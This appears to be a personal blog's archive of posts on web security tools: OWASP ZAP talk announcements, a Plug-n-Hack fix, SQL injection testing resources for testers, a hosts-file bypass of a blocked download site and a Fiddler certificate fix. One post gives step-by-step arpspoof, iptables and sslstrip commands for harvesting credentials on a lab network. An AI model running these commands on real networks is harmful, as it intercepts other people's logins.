Computers, Programming, Technology, Music, Literature

Archive for the ‘proxy’ Category

OWASP ZAP Demonstration at OWASP Bangalore/Null meet on 22 Nov 2014

leave a comment »

 

 

 

 

http://null.co.in/event_sessions/171-owasp-zap-tool-demo

Abstract
The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. Originally a fork of the Paros Proxy project, ZAP targets a wide range of software professionals right from a software developer to a penetration tester working on any platform that supports Java. Equipped with a myriad a features and support for custom addons, ZAP is fully documented in an easy to understand language.

We would see a demonstration of how to set up and how to use it all.
Speaker
Marudhamaran Gunasekaran

Timing
Starts at Saturday November 22 2014, 12:15 PM. The sessions runs for about 1 hour.

Advertisements

Written by gmaran23

June 1, 2015 at 10:33 pm

Practical Security Testing For Developers Using OWASP ZAP at Dot Net Bangalore 3rd meet up on Feb 21 2015

leave a comment »

 

 

 

Title Practical Security Testing for Developers using OWASP ZAP
Abstract Every time an application faces the world wide web, it inherently becomes vulnerable to attacks. The attackers could be script kiddies, joyriders, turning from hobbyists to downright hostile. The earlier in the development cycle you find the vulnerabilities, the better they are to fix and test. OWASP ZAP is a free and open source penetration testing tool for finding vulnerabilities in web applications; widely used by security professionals, it is also ideal for anyone new to web application security and includes features specifically aimed at developers. This session shows/demonstrates some attacks against web applications and how OWASP ZAP could be used to find those vulnerabilities, both manually and by automated builds.
Gist See live attacks against web applications and how OWASP ZAP could be used to find those vulnerabilities, both manually and by automated builds.
Speaker Marudhamaran Gunasekaran
Time & Venue 21 Feb 2015 @ Dot Net Bangalore 2nd meet up

Plug-n-Hack and ZAP: manually changed proxy settings after initial pnh configuration

with one comment

 

Plug-n-Hack introduces and proposes new standards to integrate security tools with the browsers, enabling communication between them. OWASP ZAP has inbuilt support for Plug-n-Hack (pnh) which allows you to configure Firefox to change it’s proxy settings so that OWASP ZAP could watch the FireFox traffic.

Configuration is a child’s play. Point your browser to the ZAP proxy address, follow instructions, and you are done. Just like the gif image below.

Plug-n-Hack and Zap

This changes Firefox to use a proxy configuration provided via the http://localhost:7070/proxy.pac file.

clip_image002

All works.

But, out of curiosity if you went and changed the FireFox proxy settings to No Proxy or Auto-detect proxy settings for this network or Use system proxy settings then the FireFox traffic would not be proxied through ZAP which is expected, Right? That works just fine.

However, when you want Firefox traffic to be proxied through ZAP again, you would copy paste the ZAP proxy address (http://localhost:7070/pnh) in Firefox again, and Firefox would then say A provider with this name has already been configured

clip_image002[5]

What is your expectation now?

I don’t know, as a user my expectation when I pasted the http://localhost:7070/pnh url in Firefox is that it should configure my Browser to route it’s traffic via ZAP. But that does not happen.

How to fix?

You can override the proxy settings yourself. Or you could actually use pnh to clear and remove a configuration and then point Firefox to http://localhost:7070/pnh

Shift + F2 in Firefox and then two commands for you:

 

pnh config clear ‘OWASP ZAP’

pnh config remove ‘OWASP ZAP’

 

clip_image002[7]

clip_image004

Written by gmaran23

November 19, 2014 at 6:13 pm

Devouring Security: Sslstrip and arpspoofing for credential harvesting

leave a comment »

 

 

 

You may think you are connecting to a website over ssl, but did you forget to check https at the address bar?

 

 

http://www.thoughtcrime.org/software/sslstrip/

 

 

Victim – Windows 7 – 192.168.100.11

Attacker – Kali linux – 192.168.100.215

 

arpspoof gateway – 192.168.100.1

 

 

•Flip your machine into forwarding mode.

echo "1" > /proc/sys/net/ipv4/ip_forward

 

•Run arpspoof to convince a network they should send their traffic to you.

arpspoof -i <interface> -t <targetIP> <gatewayIP>

 

arpspoof -i eth0 -t 192.168.100.11 192.168.100.1

 

•Setup iptables to redirect HTTP traffic to sslstrip.

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>

 

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

 

•Run sslstrip.

sslstrip.py -l <listenPort>

 

sslstrip

 

Written by gmaran23

July 4, 2014 at 8:58 pm

Sql Injection testing for QA (testers)

leave a comment »

 

 

This video is for anyone that likes to know how to test an application for Sql Injection. The content and presentation was focussed on Quality Assurance personnel who are not penetration testers.

Agenda:
Context setting
Quick introduction –
GET/POST/PUT/DELETE
XML/SOAP/JSON
Browser addons for easy proxy switching
Intercepting proxies – Fiddler, OWASP ZAP, BurpSuite, ..?
Fuzzing and identifying vulnerable parameters
Code review pointers for Buddy testing
Demonstration Fiddler, ZAP, sqlmap, Sql Inject Me
Firsthand experience with Sqli tools (Vijay/Shashank)
Feedback

 

Related Blogs/Videos/Downloads:

Devouring Security – Sql Injection Part 2  | http://vimeo.com/85256464
Devouring Security – Sql Injection Part 1  | http://vimeo.com/83658524

Foxy Proxy

Chrome extension (open from chrome browser) – https://chrome.google.com/webstore/detail/foxyproxy-standard/gcknhkkoolaabfmlnjonogaaifnjlfnp?hl=en

Firefox Extenstion (open from Firefox) – https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

fiddler

http://www.telerik.com/download/fiddler

OWASP zap

https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

sqlmap

http://sqlmap.org/

active python

http://www.activestate.com/activepython/downloads

Mantra browser

http://www.getmantra.com/download.html

Written by gmaran23

May 9, 2014 at 10:39 pm

unblock uploaded.net with hosts file entry

with 25 comments

,

Scroll to the solution section or click here if you want to skip some rant.

It’s May 1, I live in India, I desperately wanted to download some learning material, and uploaded.net is blocked here. Well, say ‘fuck’ to the government’s censorship. I used to think it was the imbecile firewall at my office, but when it tried at my home internet recently, IE gives PCBD, and chrome gives you bummer. I did not want to use a web proxy right off, because sometimes they just do not work with AJAX enabled, cookie enabled websites. And most of them do not support file downloads (at least in my experience, may be i haven’t tried harder).

I hate it when the security builders leave loopholes, and hide behind the face of the infamous dialog in the security industry ‘Nothing is 100% secure’. Well, you forgot the basics. When you block a website, you don’t block it based on the domain name. You got to be more advanced than a firewall using school kid.

I will show you a simple hosts file entry technique here to bypass the tyranny.

 

Wow, don’t I relish and cherish to be a computer engineer. Happy labor day.

 

Img src: http://www.imgion.com/images/01/Celebater-This-Day-With-Labour-.gif

 

Problem

When you try to access uploaded.net, you can’t connect to the server. Both http, and https equivalent of the links. Your nslookup, ping fails. Somehow you manage to get the up of uploaded.net from online dns lookup websites, and instead of http://uploaded.net you try the ip http://81.171.123.200/, even then you can’t connect.

Screenshot_050114_041052_PMScreenshot_050114_043104_PM

 

Solution

1. Go to you favorite DNS look up website, mine happens to me http://ping.eu/nslookup/

2. Look up http://uploaded.net and get the ip addess

Screenshot_050114_043343_PM

3. Add a hosts file entry to uploaded.net as 81.171.123.200. (Remember the ip address of uploaded.net may change from the time of this writing). Windows hosts file location C:\Windows\System32\drivers\etc\hosts. Linux hosts file location /etc/hosts. Open a notepad as admin (if UAC enabled in Windows Vista or abobe), use sudo in linux for your favorite text editor (gedit Smile with tongue out), if not running as root.

 

Screenshot_050114_043837_PM

4. Save the hosts file, breath the air of liberation. (and a free chick ad)

Screenshot_050114_044024_PM

5. Click the Free Download, or Premium Download (if you own a Villa, and not happen to be a miser)

6. Once your download link is generated, you get another bummer, this time the URL in the address bar happens to be a subdomain of uploaded.net with different IP address, and hence blocked. Hang on, let’s copy the complete FQDN of the server, and do a DNS look up at http://ping.eu/nslookup/

Screenshot_050114_044419_PM

7. DNS look up of http://fra-7m15-stor07.uploaded.net/ at http://ping.eu/nslookup yields an ip – 81.171.103.83. Add a host entry for the same server and ip. (Note: the download server may vary based on your location, make sure you copy the correct server name from the address for a dns lookup)

Screenshot_050114_044614_PM

image

8. Go back to your browser, hit the refresh button. See the magic.

image

 

Once again, happy labor day!

 

 

Update – Aug 9 2014 – Some commenter said it does not work anymore, so here’s a screenshot for you today. Still works.

image

Written by gmaran23

May 1, 2014 at 5:04 pm

Fiddler: Creation of interception certificate failed

with 2 comments

This post is a direct solution from hyperlink – http://harachie.wordpress.com/2011/04/05/fiddler-creation-of-interception-certificate-failed/. I find myself doing it a couple of times every month, and keep googling. Instead I thought I’d have a copy of the post myself.

 

Problem:

If you get the Fiddler error “

—————————
Unable to Generate Certificate
—————————
Creation of the interception certificate failed.

makecert.exe returned -1.

Results from C:\Program Files (x86)\Fiddler2\MakeCert.exe -r -ss my -n "CN=DO_NOT_TRUST_FiddlerRoot, O=DO_NOT_TRUST, OU=Created by http://www.fiddler2.com" -sky signature -eku 1.3.6.1.5.5.7.3.1 -h 1 -cy authority -a sha1 -m 132 -b 04/29/2013

Error: Can’t create the key of the subject (‘JoeSoft’)
Failed
——————————————-
—————————
OK  
—————————

Screenshot_043014_111514_AM

 

Solution:

Navigate to

%userprofile%\AppData\Roaming\Microsoft\Crypto\RSA

and delete the contents of the folder.

Screenshot_043014_124310_PM
(hit that damn Yes button)

Written by gmaran23

April 30, 2014 at 1:50 pm